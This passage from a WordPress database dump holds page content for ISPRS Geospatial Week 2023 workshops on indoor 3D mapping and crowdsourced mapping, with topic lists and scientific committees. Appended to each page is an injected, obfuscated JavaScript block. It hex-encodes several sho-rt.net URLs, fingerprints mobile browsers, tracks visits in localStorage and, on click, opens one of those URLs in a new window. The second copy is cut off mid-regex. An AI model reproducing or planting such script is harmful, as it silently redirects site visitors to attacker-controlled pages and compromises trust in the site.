<li>\r\n<h6><strong>Innovative LBS systems and applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Aided mobility for disabled/aged people</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Disaster prevention, analysis and management in indoor/underground environments</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Smart facility maintenance</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Spatio-temporal data modelling, analysis of movement traces</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Indoor location-linked big data</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>SLAM methods in indoor environments</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Semantic parsing in indoor environments</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Visualization techniques for LBS in indoor/outdoor seamless environments</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Indoor virtual/augmented reality</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Human environment interactions in mobility context</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-task collaboration for Indoor/outdoor modelling</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Indoor/outdoor scene understanding</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Machine/deep learning for indoor/outdoor modelling</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mobility and assistive technologies</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Semantic indoor/underground/outdoor mapping</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multimodal mobility for people with specific needs</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: purple;\"><strong><u>Scientific Committee:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Dev Raj Paudyal, University of Southern Queensland</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Berk Anbaroğlu, Geomatics Engineering Dept. of Hacettepe University</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Inger Fabris-Rotelli, University of Pretoria</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Gerhard Navratil, Technischen Universität Wien</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Kourosh Khoshelham, University of Melbourne</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Victor N. Sunday, University of Port Harcourt,</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Chenglu Wen, Xiamen University</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Yiping Chen, Sun Yat-sen University</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Ville Lehtola,  University of Twente</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Ruofei Zhong, Capital Normal University</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Yongze Song, Curtin University</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Abdoulaye Diakité, The University of New South Wales</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>David  Sánchez Rodríguez, University of Las Palmas de Gran Canaria</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Pawel Boguslawski, University of the West of England (UK),</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Umit Isikdag, Mimar Sinan Fine Arts University (Turkey)</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mohsen Kalantari, Melbourne School of Engineering</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Juntao Yang, Shandong University of Science and Technology</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Hao Cheng, Leibniz Universität Hannover</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Lei Niu, Lanzhou Jiaotong University</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5 style=\"text-align: justify; color: blue;\"><u>Selected papers:</u><u></u><u></u></h5>\r\n<h5>After the event, the authors of selected papers will be invited to submit the extended versions of their papers to the PFG – Journal of Photogrammetry, Remote Sensing and Geoinformation Science (<a style=\"color: blue;\" href=\"https://www.springer.com/journal/41064\" target=\"_blank\" rel=\"noopener\" data-saferedirecturl=\"https://www.google.com/url?q=https://www.springer.com/journal/41064&amp;source=gmail&amp;ust=1669914909168000&amp;usg=AOvVaw2hdBtPRabM3CR7bs4nXqo6\">https://www.springer.com/<wbr />journal/41064</a><a href=\"https://www.springer.com/journal/41064\" target=\"_blank\" rel=\"noopener\" data-saferedirecturl=\"https://www.google.com/url?q=https://www.springer.com/journal/41064&amp;source=gmail&amp;ust=1669914909168000&amp;usg=AOvVaw2hdBtPRabM3CR7bs4nXqo6\">)</a>; current impact factor: 3.292).</h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Indoor 3D','','inherit','closed','closed','','2586-revision-v1','','','2023-02-05 11:28:47','2023-02-05 11:28:47','',2586,'https://gsw2023.com/?p=3812',0,'revision','',0),
(3813,1,'2023-02-05 13:51:00','2023-02-05 13:51:00','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2699\" img_size=\"1000x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\">CrowdMapping: Crowdsourcing for Global Mapping</span></h5>\n<h5></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<h5></h5>\n<h5 style=\"text-align: justify; color: black;\">Crowdsourcing techniques have been widely employed to detect and map land surface dynamics, such as land use and land cover, human settlements, buildings, and crisis situations. These techniques are applied at regional and global scales to complement or substitute other specialized and expensive physical sensors aboard satellites, unmanned aerial vehicles, ground vehicles, and robots. This workshop will provide a forum for discussion of recent advances in crowdsourcing techniques for mapping global environments. Our goal is to bring together experts in global mapping who utilize Volunteered Geographic Information (VGI), User-Generated-Content, and Citizen Science to establish a common and sustainable ecosystem that will consolidate multi-disciplinary efforts from researchers and practitioners. CrowdMapping will be a key component of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology and Maritime Transport, alongside other related workshops. Since this will be the first joint workshop of the organising team, we propose to allocate a single whole day of the ISPRS Geospatial Week for oral presentations, poster sessions, and hands-on demos aligned to the CrowdMapping context.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"45\"][vc_separator][vc_row_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_size=\"0\"]</p>\n<h5 style=\"text-align:justify; color:red;\" &gt;<strong>Themes of event:</strong></p>\n<h6><strong>⦁ Land use and land cover mapping using crowdsourcing</strong><br />\n<strong>⦁ Fusion of multi-source data for land use monitoring and change detection</strong><br />\n<strong>⦁ Integration of VGI and deep learning</strong><br />\n<strong>⦁ Generation and extraction of high-quality training data from VGI</strong><br />\n<strong>⦁ Satellite image analysis using crowdsourcing data for collaborative mapping </strong><br />\n<strong>⦁ Measures, indicators, and evaluation methods of VGI quality</strong><br />\n<strong>⦁ 3D building reconstruction from VGI data</strong><br />\n<strong>⦁ Crowdsourcing-based indoor mapping</strong><br />\n<strong>⦁ Building semantic enrichment using social media data</strong><br />\n<strong>⦁ OpenStreetMap enrichment</strong><br />\n<strong>⦁ Crisis mapping using web enabled crowdsourcing</strong><br />\n<strong>⦁ Case study of VGI and crowdsourcing disaster relief</strong><br />\n<strong>⦁ Automatically mapping human settlements in rural areas</strong><br />\n<strong>⦁ Humanitarian cartography using OpenStreetMap</strong><br />\n<strong>⦁ Unified platform for earth observation using Citizen Science</strong><br />\n<strong>⦁ Extraction of urban functional regions from location-enabled social networks</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_size=\"0\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Scientific Committee:</strong></h5>\n<h6><strong>⦁ João Porto de Albuquerque, University of Glasgow, UK</strong><br />\n<strong>⦁ Jamal Jokar Arsanjani, Aalborg University, Denmark</strong><br />\n<strong>⦁ Ana Basiri, University of Glasgow, UK</strong><br />\n<strong>⦁ Lucy Bastin, Aston University, UK</strong><br />\n<strong>⦁ Alexander Brenning, Friedrich Schiller University, Germany</strong><br />\n<strong>⦁ Cidália Fonte, Universidade de Coimbra, Portugal</strong><br />\n<strong>⦁ Jukka Krisp, Universität Augsburg, Germany</strong><br />\n<strong>⦁ Pascal Neis, University of Applied Sciences Mainz, Germany</strong><br />\n<strong>⦁ Tessio Novack, University of Warwick, UK</strong><br />\n<strong>⦁ Bernd Resch, University of Salzburg, Austria</strong><br />\n<strong>⦁ Hansi Senaratne, German Aerospace Center(DLR), Germany</strong><br />\n<strong>⦁ Bisheng Yang, Wuhan University, China</strong><br />\n<strong>⦁ Xiaoxiang Zhu, German Aerospace Center(DLR), Germany</strong><br />\n<strong>⦁ Alexlander Zipf, Universität Heidelberg, Germany</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Supporting ISPRS Working Groups:</strong></h5>\n<h6><strong>⦁ WG I/4: LiDAR, Laser Altimetry and Sensor Integration</strong></h6>\n<h6>\n<strong>⦁ WG VI/4: Data management for Spatial Scenarios</strong></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g 